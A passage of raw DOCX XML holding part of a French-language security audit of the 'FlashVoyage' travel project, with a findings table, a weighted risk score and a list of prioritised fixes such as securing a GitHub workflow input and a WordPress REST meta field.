              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Autorisation / API WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wordpress/flashvoyage-widgets.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Divulgation du chemin local absolu du développeur dans cursor-mcp-config.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Moyenne</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Divulgation d'information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cursor-mcp-config.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Identifiants Travelpayouts (TRS/Marker) hardcodés dans le code source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Moyenne</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Secrets / Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">travelpayouts-real-widgets-database.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.DS_Store commité dans le repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Faible</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration / Hygiène Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.DS_Store (racine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier de backup .bak commité (intelligent-content-analyzer-optimized.js.bak)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Faible</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hygiène Git / Code mort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">intelligent-content-analyzer-optimized.js.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">JSON.parse sans try/catch sur les réponses LLM (multiples fichiers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Faible</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gestion des erreurs / Robustesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">external-links-detector.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pas de Content Security Policy (CSP) configurée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEF7FD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informatif</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Headers HTTP de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wordpress/flashvoyage-widgets.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Commandes shell dans des scripts Node.js déclenchables manuellement (delete-last-5-articles.js)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEF7FD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informatif</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Opérations destructrices non protégées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">delete-last-5-articles.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Score de risque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233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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Pondération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Secrets &amp; Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IDs affiliation hardcodés, pas de secrets critiques en clair</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aucun CVE détecté (npm audit clean)</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Code source</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JSON.parse non protégé, pas d'injection critique identifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Authentification</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Auth WordPress correcte mais REST API page sans auth_callback</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuration &amp; CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection workflow_dispatch, TLS bypass, chemins locaux exposés</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptographie</w:t>
            </w:r>
          </w:p>
        </w:tc>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67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5/10</w:t>
            </w:r>
          </w:p>
        </w:tc>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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TLS désactivé pour source externe, Math.random pour sélection (non-crypto)</w:t>
            </w:r>
          </w:p>
        </w:tc>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">×0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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SCORE GLOBAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:gridSpan w:val="1"/>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left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">4.5 / 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risque modéré — Priorité haute sur CI/CD et REST API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Actions prioritaires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5460"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Priorité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5460"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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1A233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Délai recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Corriger l'injection shell dans generate-seo-pages.yml (FV-002) : passer les inputs par des variables env: et valider par whitelist côté bash.</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 48h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">URGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ajouter auth_callback sur register_post_meta('page'...) dans le plugin WordPress (FV-003) pour empêcher l'écriture de JSON-LD non autorisée.</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 48h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HAUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Remplacer rejectUnauthorized: false par l'épinglage du certificat du fournisseur Travel Advisory ou demander au fournisseur de corriger son certificat (FV-001).</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MOYENNE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Supprimer cursor-mcp-config.json du repository et le remplacer par un fichier .example (FV-004). Purger de l'historique Git si nécessaire.</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MOYENNE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Forcer les identifiants Travelpayouts via variables d'environnement sans valeur par défaut (FV-005).</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 2 semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">FAIBLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Nettoyer les fichiers parasites (.DS_Store, .bak) et mettre à jour le .gitignore (FV-006, FV-007).</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 2 semaines</w:t>
            </w:r>
